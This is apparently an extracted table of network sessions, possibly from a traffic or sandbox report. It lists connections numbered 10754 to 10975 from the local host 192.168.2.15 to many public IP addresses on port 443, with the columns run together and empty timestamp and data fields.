                                            10754192.168.2.1554096179.179.98.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10755192.168.2.1559820216.42.108.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10756192.168.2.154502438.96.99.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10757192.168.2.1537296210.202.38.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10758192.168.2.1557368149.250.43.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10759192.168.2.154289094.22.94.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10760192.168.2.1548346130.6.91.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10761192.168.2.1547464131.36.25.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10762192.168.2.153351894.104.181.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10763192.168.2.1557266181.101.165.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10764192.168.2.154427431.66.147.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10765192.168.2.1558676192.245.123.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10766192.168.2.1540414160.38.187.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10767192.168.2.1547966114.230.101.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10768192.168.2.155842247.127.99.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10769192.168.2.154638625.12.35.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10770192.168.2.1533632166.105.138.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10771192.168.2.154748260.142.104.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10772192.168.2.153834036.93.99.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10773192.168.2.1556604112.101.190.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10774192.168.2.155568034.157.13.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10775192.168.2.1538284139.212.208.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10776192.168.2.1552814200.22.117.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10777192.168.2.1556742106.102.244.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10778192.168.2.156013049.68.35.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10779192.168.2.154987054.68.27.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10780192.168.2.154457252.170.23.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10781192.168.2.1555014154.231.247.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10782192.168.2.154659839.4.161.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10783192.168.2.1534522177.64.184.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10784192.168.2.1557990126.222.175.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10785192.168.2.154723279.250.80.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10786192.168.2.1540600182.191.62.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10787192.168.2.1541258191.24.135.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10788192.168.2.1544812209.200.41.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10789192.168.2.1544690133.23.183.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10790192.168.2.1551984102.145.44.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10791192.168.2.154019460.135.115.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10792192.168.2.156064261.110.141.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10793192.168.2.1536644176.53.108.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10794192.168.2.155059096.234.188.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10795192.168.2.154471060.171.224.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10796192.168.2.1548264223.79.138.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10797192.168.2.1559858155.165.239.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10798192.168.2.1558098204.191.74.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10799192.168.2.1541288181.69.133.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10800192.168.2.1552460152.61.135.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10801192.168.2.1536386205.127.27.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10802192.168.2.1535432114.241.176.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10803192.168.2.1547938104.94.251.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10804192.168.2.155412012.138.109.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10805192.168.2.1551512188.227.190.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10806192.168.2.15547404.137.18.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10807192.168.2.1550048186.254.119.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10808192.168.2.1540194190.99.136.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10809192.168.2.1552092142.184.229.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10810192.168.2.153370040.94.235.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10811192.168.2.154105219.56.43.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10812192.168.2.1536602187.44.208.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10813192.168.2.153576853.1.245.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10814192.168.2.1536172164.63.148.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10815192.168.2.153434817.66.239.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10816192.168.2.15567269.98.103.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10817192.168.2.1538804192.149.209.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10818192.168.2.1544012101.56.217.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10819192.168.2.155655652.210.150.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10820192.168.2.1540970105.2.119.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10821192.168.2.1552108114.68.118.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10822192.168.2.154583087.243.9.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10823192.168.2.1535326177.49.103.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10824192.168.2.153527614.66.7.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10825192.168.2.153826448.64.167.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10826192.168.2.1556250107.76.41.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10827192.168.2.155195895.224.241.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10828192.168.2.155588671.178.77.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10829192.168.2.153587886.12.243.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10830192.168.2.155332850.74.205.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10831192.168.2.154648696.96.204.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10832192.168.2.1537780124.116.168.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10833192.168.2.1541068115.217.187.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10834192.168.2.1546816143.143.249.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10835192.168.2.1552394159.182.239.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10836192.168.2.155089625.174.4.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10837192.168.2.154488044.92.184.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10838192.168.2.1538072112.42.128.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10839192.168.2.1548548105.71.247.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10840192.168.2.155845058.0.13.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10841192.168.2.1557788116.209.200.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10842192.168.2.1532848130.149.19.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10843192.168.2.1538650157.227.112.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10844192.168.2.1542408202.146.114.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10845192.168.2.1555930210.2.111.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10846192.168.2.1544946151.9.107.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10847192.168.2.1534730199.46.82.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10848192.168.2.155876052.72.144.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10849192.168.2.1559814223.105.238.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10850192.168.2.1544260162.26.128.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10851192.168.2.1544668122.33.104.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10852192.168.2.154635057.233.25.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10853192.168.2.1559548205.7.44.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10854192.168.2.1538852158.79.115.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10855192.168.2.1540980220.118.135.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10856192.168.2.1545692143.147.113.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10857192.168.2.1556266223.141.184.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10858192.168.2.15595404.204.108.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10859192.168.2.15389449.59.32.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10860192.168.2.1548078217.83.62.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10861192.168.2.1542034168.98.205.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10862192.168.2.1559766125.177.70.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10863192.168.2.153312278.100.99.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10864192.168.2.154240090.143.172.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10865192.168.2.1551220134.118.96.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10866192.168.2.155016088.147.222.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10867192.168.2.1544366201.19.200.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10868192.168.2.154737264.127.148.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10869192.168.2.153420274.20.166.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10870192.168.2.154717625.55.117.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10871192.168.2.155691219.101.231.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10872192.168.2.154570663.41.139.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10873192.168.2.1534048190.54.154.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10874192.168.2.1554836166.219.233.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10875192.168.2.1542412104.131.224.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10876192.168.2.1542716205.64.184.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10877192.168.2.15605241.220.73.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10878192.168.2.1547408116.66.229.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10879192.168.2.1552668171.141.122.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10880192.168.2.1536640118.5.189.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10881192.168.2.155580234.75.233.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10882192.168.2.1551262143.226.177.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10883192.168.2.1544708182.43.132.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10884192.168.2.1548472156.244.67.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10885192.168.2.1534614126.168.172.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10886192.168.2.154029234.143.17.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10887192.168.2.1553804112.141.236.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10888192.168.2.154051487.139.43.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10889192.168.2.1546694186.41.189.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10890192.168.2.1549292107.71.195.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10891192.168.2.1556256203.163.76.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10892192.168.2.1541250187.5.169.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10893192.168.2.1542160125.28.38.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10894192.168.2.1550566194.224.234.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10895192.168.2.154344661.222.15.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10896192.168.2.154513267.37.183.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10897192.168.2.1560290182.87.141.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10898192.168.2.1532866138.49.113.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10899192.168.2.1553186198.109.87.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10900192.168.2.154308242.144.246.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10901192.168.2.154981845.214.125.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10902192.168.2.155932419.77.225.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10903192.168.2.155193277.202.112.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10904192.168.2.1551712211.20.173.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10905192.168.2.15582384.65.7.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10906192.168.2.155613486.74.63.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10907192.168.2.154976817.78.120.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10908192.168.2.155095271.185.184.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10909192.168.2.1542926184.152.22.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10910192.168.2.1537012191.121.72.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10911192.168.2.1540026207.235.206.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10912192.168.2.154114897.234.24.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10913192.168.2.1546714180.70.86.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10914192.168.2.154545882.130.54.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10915192.168.2.1547504209.206.249.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10916192.168.2.156045669.131.243.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10917192.168.2.1553386219.217.65.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10918192.168.2.1552628128.186.119.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10919192.168.2.1535032110.126.206.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10920192.168.2.1546574156.217.29.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10921192.168.2.155581859.131.210.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10922192.168.2.1548134120.176.165.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10923192.168.2.155565669.186.10.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10924192.168.2.155614664.226.197.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10925192.168.2.1540212208.14.158.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10926192.168.2.1537788150.185.80.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10927192.168.2.1541430134.64.232.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10928192.168.2.1534380185.193.11.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10929192.168.2.1550190156.59.0.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10930192.168.2.1535666217.153.90.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10931192.168.2.15444149.49.145.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10932192.168.2.154762074.24.200.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10933192.168.2.1537166156.3.218.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10934192.168.2.1538908151.51.120.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10935192.168.2.1560466203.241.255.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10936192.168.2.1542954165.52.93.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10937192.168.2.1536064170.73.112.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10938192.168.2.155539440.144.166.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10939192.168.2.1536934106.167.198.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10940192.168.2.153544873.34.78.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10941192.168.2.1534572153.57.14.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10942192.168.2.154694286.169.102.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10943192.168.2.1543662119.220.211.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10944192.168.2.15342868.109.98.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10945192.168.2.1535700123.128.253.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10946192.168.2.1554278118.33.6.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10947192.168.2.1554758157.221.201.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10948192.168.2.1541822180.206.230.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10949192.168.2.153394017.243.133.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10950192.168.2.1549756180.67.45.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10951192.168.2.1554516131.221.165.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10952192.168.2.155540827.143.22.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10953192.168.2.155035294.153.22.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10954192.168.2.1538290203.93.116.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10955192.168.2.153285623.227.96.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10956192.168.2.1557360100.25.140.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10957192.168.2.1558642131.17.159.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10958192.168.2.155296057.175.30.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10959192.168.2.1543962156.86.43.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10960192.168.2.15567042.81.241.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10961192.168.2.1538414222.237.49.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10962192.168.2.153442034.184.88.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10963192.168.2.155467854.203.64.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10964192.168.2.154557252.5.94.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10965192.168.2.1534428134.205.35.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10966192.168.2.153714647.70.11.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10967192.168.2.1549980209.70.196.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10968192.168.2.1550936181.157.198.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10969192.168.2.1537302197.164.208.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10970192.168.2.1560840135.50.222.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10971192.168.2.1546038102.118.1.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10972192.168.2.1559534102.198.41.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10973192.168.2.1546284202.231.185.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10974192.168.2.1548540135.98.55.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10975192.168.2.1557492113.74.91.195443
                                            TimestampBytes transferredDirectionData


